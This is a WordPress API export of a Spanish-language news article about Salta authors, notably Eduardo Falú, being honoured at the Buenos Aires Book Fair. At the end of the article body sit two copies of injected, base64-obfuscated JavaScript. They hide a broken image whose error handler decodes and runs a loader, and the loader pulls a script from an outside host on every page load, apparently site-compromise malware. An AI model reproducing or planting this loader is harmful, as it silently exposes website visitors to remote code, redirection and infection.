{"id":2579,"date":"2023-04-28T11:38:37","date_gmt":"2023-04-28T14:38:37","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2579"},"modified":"2025-08-14T00:17:49","modified_gmt":"2025-08-14T03:17:49","slug":"en-la-feria-del-libro-de-buenos-aires-homenajearon-a-autores-saltenos-centenarios","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2579","title":{"rendered":"En la Feria del Libro de Buenos Aires homenajearon a autores salte\u00f1os centenarios"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7c0422\"><em>Durante el acto por el D\u00eda de la Provincia en el Predio Ferial de La Rural, se destac\u00f3 al escritor Eduardo Fal\u00fa, a cien a\u00f1os de su nacimiento, junto a otros escritores salte\u00f1os.<\/em><\/h3>\n\n\n\n<p>Durante los d\u00edas de la Feria del Libro en Buenos Aires, la puesta en com\u00fan estar\u00e1 dedicada a la industria editorial y a la capacitaci\u00f3n de los profesionales. Editores, libreros, distribuidores, agentes literarios, gr\u00e1ficos, traductores, ilustradores y bibliotecarios se dan cita para realizar intercambios comerciales, concretar negocios y participar de seminarios de actualizaci\u00f3n. En este contexto, se homenaje\u00f3 a&nbsp;<strong>Eduardo Fal\u00fa<\/strong>&nbsp;en el centenario de su natalicio.<\/p>\n\n\n\n<p>Eduardo Fal\u00fa vivi\u00f3 en Met\u00e1n, donde su padre ten\u00eda un negocio de ramos generales. Sus progenitores, Juan y Fada Fal\u00fa, eran inmigrantes sirios. All\u00ed comenz\u00f3 a tocar guitarra en forma autodidacta a los once a\u00f1os de edad, y en 1937 se radic\u00f3 en la ciudad de Salta donde realiz\u00f3 sus estudios profesionales.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6894-se-homenajearon-autores-saltenios-centenarios-en-la-feria-del-libro-de-buenos-aires.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6894-se-homenajearon-autores-saltenios-centenarios-en-la-feria-del-libro-de-buenos-aires.jpg\" alt=\"Se homenajearon autores salte\u00f1os centenarios en la Feria del Libro de Buenos Aires\"\/><\/a><\/figure>\n\n\n\n<p>Compuso piezas folcl\u00f3ricas de inestimable valor junto a otros grandes artistas salte\u00f1os tanto desde el punto de vista musical como est\u00e9tico, sobre letras de grandes poetas centenarios como Jaime D\u00e1valos, \u201cZamba de la Candelaria\u00bb, &nbsp;\u00abTrago de sombra\u00bb, \u00abTonada del viejo amor\u00bb, \u00abRenacer\u00bb, \u00abAmor, se llama amor\u00bb, \u00abMilonga del alucinado\u00bb. El artista comparti\u00f3 obras con Manuel J. Castilla, Osiris Rodr\u00edguez Castillos, entre otros.<\/p>\n\n\n\n<p>Fue Premio Konex de Platino 1985 como Instrumentista de Folklore. En 2015 recibi\u00f3 con car\u00e1cter p\u00f3stumo un nuevo Premio Konex, el Diploma al M\u00e9rito en la disciplina Instrumentista.<\/p>\n\n\n\n<p>Como un homenaje en vida a Eduardo Fal\u00fa fue inaugurado el 16 de abril de 2011 en el 429.\u00ba aniversario de la fundaci\u00f3n de la ciudad de Salta un anfiteatro en su honor.<\/p>\n\n\n\n<p>El acto celebrado en la Feria del Libro, tambi\u00e9n reconoci\u00f3 a artistas centenarios que posicionaron la Cultura de Salta a nivel nacional e internacional, como Sara San Mart\u00edn, Antonio Nella Castro, Ra\u00fal Ar\u00e1oz Anzoategui y Jos\u00e9 Juan Botelli.<\/p>\n\n\n\n<p>La celebraci\u00f3n homenaje cont\u00f3 con la proyecci\u00f3n de un audiovisual conmemorativo, las lecturas de Mario Flores y Soledad Olarte; la presentaci\u00f3n de Mariana M\u00e1rquez y Agust\u00edn Vidal en guitarra y canto, junto a la intervenci\u00f3n art\u00edstica de Nicolas Picatto.<\/p>\n\n\n\n<figure class=\"wp-block-image alignwide\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6895-se-homenajearon-autores-saltenios-centenarios-en-la-feria-del-libro-de-buenos-aires.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6895-se-homenajearon-autores-saltenios-centenarios-en-la-feria-del-libro-de-buenos-aires.jpg\" alt=\"Se homenajearon autores salte\u00f1os centenarios en la Feria del Libro de Buenos Aires\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-la-feria-del-libro-de-buenos-aires-homenajearon-a-autores-saltenios-centenarios-89382\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Durante el acto por el D\u00eda de la Provincia en el Predio Ferial de La Rural, se destac\u00f3 al escritor Eduardo Fal\u00fa, a cien a\u00f1os de su nacimiento, junto a otros escritores salte\u00f1os. Durante los d\u00edas de la Feria del Libro en Buenos Aires, la puesta en com\u00fan estar\u00e1 dedicada a la industria editorial y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2580,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2579","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2579"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2579"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2579\/revisions"}],"predecessor-version":[{"id":7097,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2579\/revisions\/7097"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2580"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}